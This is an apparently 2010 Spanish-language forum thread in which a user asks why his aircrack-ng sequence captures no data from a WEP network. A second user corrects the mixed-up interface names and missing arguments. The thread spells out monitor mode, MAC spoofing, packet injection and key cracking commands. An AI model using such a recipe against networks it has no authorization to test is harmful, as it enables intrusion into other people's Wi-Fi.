Autor Tema: No me coge datas  (Leído 3801 veces)

0 Usuarios y 1 Visitante están viendo este tema.

rubensppg

  • Visitante
No me coge datas
« en: 28-02-2010, 20:28 (Domingo) »
Esta es la tarjeta que utilizo:

http://www.ciudadwireless.com/erize_erzw54-usb04rs1w-o14_adaptador_wireless_para_exterior_antena_integrada_14dbi-p-2832.html

El chip es este que es que importa en realidad: Chipset Realtek 8187L (RTL8187L)

utilizo este codigo y no me coje datas,porq puede ser?( tipo de clave es WEP)
*utilizo wifiway 1.0 Final que ya tiene los drivers(o eso creo jeje)

iwconfig wlan0 mode monitor

airmon-ng stop wlan0

ifconfig wlan0 down

macchanger --mac 00:11:22:33:44:55 wlan0

airmon-ng start wlan0


despues pongo airodump-ng wlan0 para anotar el Essid,Bssid y el Bassid

iwconfig wlan0 up

iwconfig wifi0 rate 1M

airodump-ng --bssid 00:11:22:33:44:55 -c CANAL -w datos wifi0

-Abrimos una nueva Shell para empezar a inyectar:

aireplay-ng -1 0 -e essid -a mac ap -h mac nuestra . esto para estar asociados y luego

aireplay-ng -3 -x 600 -b mac ap -h mac nuestra

aircrack-ng datos-01.cap

Necesito ayudaaa muchas gracias!!


« Última modificación: 28-02-2010, 20:41 (Domingo) por rubensppg »

chinitiw

  • Visitante
Re: No me coge datas
« Respuesta #1 en: 28-02-2010, 21:33 (Domingo) »
Esta es la tarjeta que utilizo:

http://www.ciudadwireless.com/erize_erzw54-usb04rs1w-o14_adaptador_wireless_para_exterior_antena_integrada_14dbi-p-2832.html

El chip es este que es que importa en realidad: Chipset Realtek 8187L (RTL8187L)

utilizo este codigo y no me coje datas,porq puede ser?( tipo de clave es WEP)
*utilizo wifiway 1.0 Final que ya tiene los drivers(o eso creo jeje)

iwconfig wlan0 mode monitor

airmon-ng stop wlan0

ifconfig wlan0 down

macchanger --mac 00:11:22:33:44:55 wlan0

airmon-ng start wlan0


despues pongo airodump-ng wlan0 para anotar el Essid,Bssid y el Bassid ( Ya me dirás tu ¿? )

iwconfig wlan0 up

iwconfig wifi0 rate 1M tu interface no es wlan0 ¿?

airodump-ng --bssid 00:11:22:33:44:55 -c CANAL -w datos wifi0  Más de lo mismo tu interfaz es wlan0

-Abrimos una nueva Shell para empezar a inyectar:

aireplay-ng -1 0 -e essid -a mac ap -h mac nuestra . esto para estar asociados y luego Falta tu interfaz

aireplay-ng -3 -x 600 -b mac ap -h mac nuestra Falta tu interfaz

aircrack-ng datos-01.cap

Necesito ayudaaa muchas gracias!!


Además de ayuda , necesitas comprender las cosas , no hacerlas porque si , sinó no conseguiras nada de nada , es como dar palos de ciego.

deberías empezar , por este post

https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/mi-primera-auditor237a/

Saludos


rubensppg

  • Visitante
Re: No me coge datas
« Respuesta #2 en: 01-03-2010, 10:42 (Lunes) »
solo quiero q me digan si esta mal el codigo
porq lo que e puesto ay lo entindo todo!!


chinitiw

  • Visitante
Re: No me coge datas
« Respuesta #3 en: 01-03-2010, 15:02 (Lunes) »
el "codigo" como tu lo llamas está mal porque tiene nombradas dos interfaces de dos tarjetas distintas una atheros y otra (la que tu dices) , además si lo entendieras sabrías que eso no puede ser así.

Si quieres pregunta lo que necesites , pero creo que has copiado y pegado de varios sitios y ahora tienes un gran "cacao" armado

Saludos